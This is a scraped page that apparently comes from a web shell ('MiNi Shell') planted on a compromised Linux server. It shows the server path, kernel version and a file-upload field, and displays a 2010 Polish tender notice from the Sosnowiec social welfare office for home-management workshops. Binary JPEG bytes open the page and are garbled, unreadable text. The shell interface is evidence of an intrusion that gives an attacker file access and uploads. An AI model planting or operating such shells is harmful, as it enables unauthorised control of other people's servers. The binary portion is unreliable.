JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101122/377978-N-2010.html

<p class="kh_header"><b>Sosnowiec: Organizacja i przeprowadzenie stacjonarnych zajęć warsztatowych z zakresu profesjonalnego zarządzania domem w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1. Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 377978 - 2010; data zamieszczenia: 22.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Sosnowcu , ul. Mościckiego 14, 41-200 Sosnowiec, woj. śląskie, tel. 032 3680601, faks 032 3680614.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopssosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie stacjonarnych zajęć warsztatowych z zakresu profesjonalnego zarządzania domem w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1. Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:

Organizacja i przeprowadzenie stacjonarnych zajęć warsztatowych z zakresu profesjonalnego zarządzania domem, w ramach projektu systemowego  Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu              VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.

Organizacja i prowadzenie zajęć warsztatowych:
1.	Adresaci zadania: 
1.1. Adresatami zadania są osoby bezrobotne, nieaktywne zawodowo, zatrudnione, będące w wieku aktywności zawodowej, korzystające ze świadczeń pomocy społecznej, zagrożone wykluczeniem społecznym. 
1.2. Liczba uczestników: do 24 osób.

2.	Szkolenie warsztatowe powinno obejmować:
2.1. Prowadzenie zajęć warsztatowych - w dwóch grupach z zakresu profesjonalnego zarządzania domem, w szczególności: 
a) efektywnego wykorzystania własnego czasu (planowanie i organizacja dnia codziennego), 
b) właściwego gospodarowania środkami finansowymi w tym:
- szukania oszczędności w codziennych wydatkach domowych (oszczędzanie na: zakupach, telefonach, energii, wodzie, ogrzewaniu),
	- kontrolowanie wydatków,
	- racjonalnego korzystania z instytucji pożyczkowych,
	- planowania przewidywalnych wydatków,
	- psychologia wyboru- zakupy codzienne i okazyjne,
	- asertywność w kontaktach z handlowcami,
c) elementy profesjonalnego sprzątania:
	- ogólne zasady dotyczące sprzątania i zasad panujących w domu,
	- środki czystości - omówienie poszczególnych rodzajów środków czystości i ich przeznaczenia,
	- sprzęty AGD używane do sprzątania i używanie ich zgodnie z przeznaczeniem.
2.2. Każda grupa uczestniczyć będzie w zajęciach trwających 20 godzin lekcyjnych tj.                  5 spotkań po 4 godziny lekcyjne, w okresie od 17.12.2010 do 22.12.2010.                            (przez 5 dni w tym sobota).
Zajęcia powinny odbywać się w dniu 17.12.2010r. od 16:00 do 19:00.
od 18.12.2010r. do 22.12.2010r. od 8:00 do 13:00.

3. Miejsce i czas realizacji zadania
3.1 Szkolenie powinno być zrealizowane na terenie miasta Sosnowca.
3.2 Termin realizacji zamówienia w okresie od 17.12.2010 do 22.12.2010r. (przez 5 dni              w tym sobota).
4. Wykonawca w ramach szkolenia winien zapewnić:
4.1. Ubezpieczenie od następstw nieszczęśliwych wypadków powstałych w trakcie zajęć oraz w drodze z miejsca zamieszkania do miejsca zajęć oraz w drodze powrotnej do miejsca zamieszkania dla 24 uczestników szkolenia. Kopia polisy (potwierdzona za zgodność z oryginałem, przez Wykonawcę) winna być dostarczona Zamawiającemu najpóźniej w dniu rozpoczęcia zajęć. Minimalna suma ubezpieczenia 10 000zł, na każdego uczestnika.
4.2. Poczęstunek kawowy dla max. 24 uczestników szkolenia, w przerwie po 2 godzinach szkolenia - zgodnie z harmonogramem.
4.3. Pod pojęciem poczęstunku kawowego w czasie jednodniowego spotkania dla jednej grupy uczestników warsztatów, należy rozumieć:
1) termosy z gorącą kawą rozpuszczalną - na osobę ma przypadać: 
- 200 ml kawy,
- naczynie jednorazowego użytku - kubek do gorących napojów z tworzywa sztucznego 
(1 sztuka), 
- mieszadełko jednorazowe z tworzywa sztucznego (1 sztuka),
-  2 łyżeczki cukru ,
- 30 ml śmietanki w płynie.
2) termosy z gorącą wodą - na osobę ma przypadać: 
- 200ml wody, 
- herbata czarna w saszetkach (1 sztuka), 
- naczynie jednorazowego użytku - kubek do gorących napojów z tworzywa sztucznego
 (1 sztuka), 
- mieszadełko jednorazowe z tworzywa sztucznego (1 sztuka), 
- 2 łyżeczki cukru,
- 1plasterek świeżej cytryny.
3) Dzbanki z wodą mineralną niegazowaną - na osobę ma przypadać:
- 200 ml wody,
- naczynie jednorazowego użytku - plastikowy kubek,
- 1 plasterek świeżej cytryny.
4) drożdżówka lub pączek - 1szt. / os.
5) talerzyki papierowe (deserowe) - 1szt./os.
6) serwetka jednorazowa - 1szt/os.
Zarówno mieszadełka jak i kubki muszą być dopuszczone do kontaktu z żywnością.
Wszystkie produkty żywnościowe (z wyjątkiem pączków, słodkich bułek i cytryny) dostarczone w ramach poczęstunku powinny posiadać przynajmniej 6 miesięczny termin przydatności do spożycia, od momentu dostawy.
4.4. Wykonawca zapewni utrzymanie czystości w pomieszczeniach, w których odbywać będzie się szkolenie.
4.5. Poczęstunek kawowy winien być dostarczony zgodnie z harmonogramem zajęć warsztatowych.
Wykonawca zobowiązany jest monitorować na bieżąco nieobecności uczestników zajęć warsztatowych, celem dostarczania poczęstunku kawowego adekwatnie do wykazanej obecności osób w danym dniu i szkoleniu.


5. Wykonawca jest zobowiązany do:
5.1. Opracowania harmonogramu zajęć warsztatowych. Harmonogram powinien być dostarczony Zamawiającemu w terminie do 3 dni od daty podpisania umowy.
5.2. Dysponowania i obsługę 2 salami szkoleniowymi na terenie miasta Sosnowca,                        które powinny być: 
a) przystosowane pod względem sanitarnym, przeciwpożarowym, oświetleniowym, akustycznym i bhp do prowadzenia szkoleń,
b) wyposażone w odpowiednią liczbę miejsc siedzących i stolików,
c) wyposażone w odpowiednie oprzyrządowanie techniczne tj.: aparaturę audiowizualną, rzutnik, tablicę flipchart,
d) w okresie zimowym ogrzewane,
e) oznakowane zgodnie z wytycznymi (dostępne na stronie internetowej http://efs.silesia-region.pl zakładka Promocja. 
Zajęcia powinny być prowadzone w salach dydaktycznych. 
5.3. Wyposażenia każdego uczestnika zajęć, w pakiet materiałów szkoleniowych oraz przekazania pakietu materiałów Zamawiającemu. Materiały szkoleniowe winny zapewnić: wysoki poziom merytoryczny, przejrzystość i spójność zawartych informacji  oraz rzeczowość i kompletność.
Materiały szkoleniowe winny być oznakowane zgodnie z wytycznymi (dostępne na stronie internetowej http://efs.silesia-region.pl zakładka Promocja)
5.4 .Udokumentowania na płycie CD, min. 10 zdjęć z prowadzonych zajęć warsztatowych oraz skompletowanie oświadczeń uczestników dotyczących wyrażenia zgody na przetwarzania danych osobowych oraz udostępnienia wizerunku i przeniesienia na Zamawiającego przysługujących Wykonawcy autorskich praw do zdjęć, na wszystkich znanych w chwili zawarcia umowy polach eksploatacji w tym określonych w art. 50 ustawy z dnia 4.02.1994r. o prawie autorskim i prawach pokrewnych (t.j. Dz. U. z 2006r. Nr 90, poz. 631 z późn. Zm.).
5.5. Zapewnienia wykwalifikowanej kadry, co najmniej 2 osób z minimum dwuletnim doświadczeniem w prowadzeniu przedmiotowych zajęć. 
5.6. Prowadzenia następującej dokumentacji: 
a) list obecności na zajęciach (zawierających tytuł szkolenia, datę, imię i nazwisko oraz podpis uczestnika),
b) dzienników zajęć, (zawierających tytuł szkolenia, listę uczestników szkolenia, konspekt zajęć)
	c) list potwierdzających odbiór materiałów szkoleniowych                            (zawierających tytuł szkolenia, imię i nazwisko oraz podpis uczestnika),
d) list potwierdzających odbiór poczęstunku kawowego                              (zawierających tytuł szkolenia, datę, imię i nazwisko oraz podpis uczestnika),
5.7. Dostarczenie do 3 dni od daty podpisania umowy Zamawiającemu programu szkolenia. 
5.8. Telefonicznego  zgłaszania Zamawiającemu informacji o nieobecnościach uczestników maksymalnie do następnego dnia po odbyciu zajęć do godz.: 9:00.
5.9. Przygotowania narzędzi do ewaluacji uczestników projektu, w postaci badań ankietowych przeprowadzonych przed i po rozpoczęciu zajęć, z zakresu profesjonalnego zarządzania domem, w szczególności: efektywnego wykorzystania własnego czasu 
(planowanie i organizacja), właściwego gospodarowania środkami finansowymi, szukania oszczędności w codziennych wydatkach domowych, perfekcyjnego sprzątania.
Analiza osiągniętych wyników ankietowych zostanie przekazana Zamawiającemu w postaci raportu. 
5.10.Sporządzenia sprawozdania końcowego z realizacji zadania zawierającego:
- ilość osób objętych wsparciem w formie szkolenia,
- liczbę osób, które zakończyły szkolenie,
- liczbę osób, które przerwały udział w szkoleniu.
5.11. Przygotowania zaświadczeń o ukończeniu zajęć warsztatowych. Zaświadczenia należy przygotować w dwóch egzemplarzach: oryginał dla uczestnika projektu, kopię potwierdzoną za zgodność z oryginałem (przez osobę upoważnioną ze strony Wykonawcy) dla Zamawiającego, oraz imienną listę wydanych zaświadczeń z podpisem uczestnika projektu.
5.12. Przekazania Wykonawcy list obecności, dzienników zajęć, list potwierdzających odbiór materiałów szkoleniowych, list potwierdzających odbiór poczęstunku kawowego oraz raportu ewaluacyjnego wraz z badaniami ankietowymi, sprawozdania 
z realizacji usługi, kopii wydanych zaświadczeń, list wydanych zaświadczeń, pakietu materiałów szkoleniowych, płyty CD wraz z oświadczeniami o wyrażeniu zgody na przetwarzanie danych osobowych i przeniesienia praw autorskich Wykonawcy do zdjęć           w terminie do 5 dni po zakończeniu zajęć, (dostępne na stronie internetowej http://efs.silesia-region.pl zakładka Promocja). Wszystkie dokumenty powinny być oznakowane zgodnie z wytycznymi dotyczącymi promocji projektów współfinansowanych z środków Europejskiego Funduszu
5.13. Archiwizacji dokumentacji związanej z przeprowadzeniem szkolenia do roku 2020. Wymóg ten związany jest z zapisami umowy ramowej dot. realizacji projektu w ramach Programu Operacyjnego Kapitał Ludzki.
5.14. Udostępnienia dokumentacji dot. realizacji szkolenia jednostkom kontrolnym                       w okresie do 2020 roku.
5.15.	Przestrzegania zasady równości szans kobiet i mężczyzn.
5.16.	Na każdym etapie realizacji zadania Zamawiający zastrzega sobie prawo                        do kontroli..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunkunależy dołączyć do oferty:
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, 
o których mowa w art.  22 ust. 1  ustawy Prawo zamówień publicznych. Ocena spełnienia warunku  nastąpi na podstawie oświadczenia metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunkunależy dołączyć do oferty:
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, 
o których mowa w art.  22 ust. 1  ustawy Prawo zamówień publicznych.Ocena spełnienia warunku  nastąpi na podstawie oświadczenia metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku należy dołączyć do oferty:
Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.
Zamawiający żąda wykazania, iż Wykonawca dysponuje co najmniej 2 salami szkoleniowymi - dydaktycznymi znajdującymi się na terenie miasta Sosnowca. Sale winny być:
a)przystosowane pod względem sanitarnym, przeciwpożarowym, oświetleniowym, akustycznym i bhp do prowadzenia szkoleń,
b)wyposażone w odpowiednią liczbę miejsc siedzących i stolików,
c)wyposażone w odpowiednie oprzyrządowanie techniczne tj.: aparaturę audiowizualną, rzutnik, tablicę flipchart,
d)w okresie zimowym ogrzewane,
e)oznakowane zgodnie z wytycznymi (dostępne na stronie internetowej http://efs.silesia-region.pl zakładka Promocja).
Ocena spełnienia warunku nastąpi na podstawie wykazu metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku należy dołączyć do oferty:
 Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz 
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami tj.: Zamawiający żąda wykazania, iż Wykonawca dysponuje:co najmniej 2 osobami posiadającymi minimum dwuletnie doświadczenie w prowadzeniu przedmiotowych zajęć. Odnośnie wykształcenia Zamawiający nie stawia warunku.
Ocena spełnienia warunku  nastąpi na podstawie wykazu metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunkunależy dołączyć do oferty:
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, 
o których mowa w art.  22 ust. 1  ustawy Prawo zamówień publicznych. Ocena spełnienia warunku nastąpi na podstawie oświadczenia metodą spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo 
Pełnomocnictwo wymagane w przypadku gdy do reprezentowania Wykonawcy upoważniona jest osoba inna niż wskazane w aktualnym odpisie z właściwego rejestru
Formularz pełnomocnictwa  jest załącznikiem nr 6 do SIWZ
W sytuacji, o której mowa w art. 26 ust.2b ustawy PZP pisemne zobowiązanie podmiotów w oryginale.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się wprowadzania istotnych zmian w umowie z naruszeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych, z zastrzeżeniem ust. 4. Zamawiający przewiduje możliwość zmiany umowy w formie pisemnej pod rygorem nieważności tylko w sytuacji:
1) zmiany miejsca przeprowadzenia szkolenia lub sal szkoleniowych,
2) zmiany terminu realizacji zamówienia poprzez przesunięcie daty rozpoczęcia i zakończenia zajęć z powodu przedłużającej się procedury przetargowej,
3) zmiany pracowników odpowiedzialnych za realizację umowy wskazanych w § 6 ust. 1 i ust. 2 niniejszej umowy,
4) zmiany harmonogramu zajęć: w tym godzin rozpoczęcia lub zakończenia zajęć,
5) zmiany osób posiadających uprawnienia, odpowiednie kwalifikacje i warunki do należytego wykonania zamówienia,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.sosnowiec.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Sosnowcu ul. Mościckiego 14 piętro III p. 321.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2010 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Sosnowcu ul. Mościckiego 14 piętro IV p. 422.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT SYSTEMOWY MODA NA SUKCES-CZYLI KROKI W SAMODZIELNOŚĆ WSPÓŁFINANSOWANY ZE ŚRODKÓW UNII EUROPEJSKIEJ Z EUROPEJSKIEGO  FUNDUSZU SPOŁECZNEGO W RAMACH PRIORYTETU VII DZIAŁANIE 7.1. PODDZIAŁANIA 7.1.1. PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com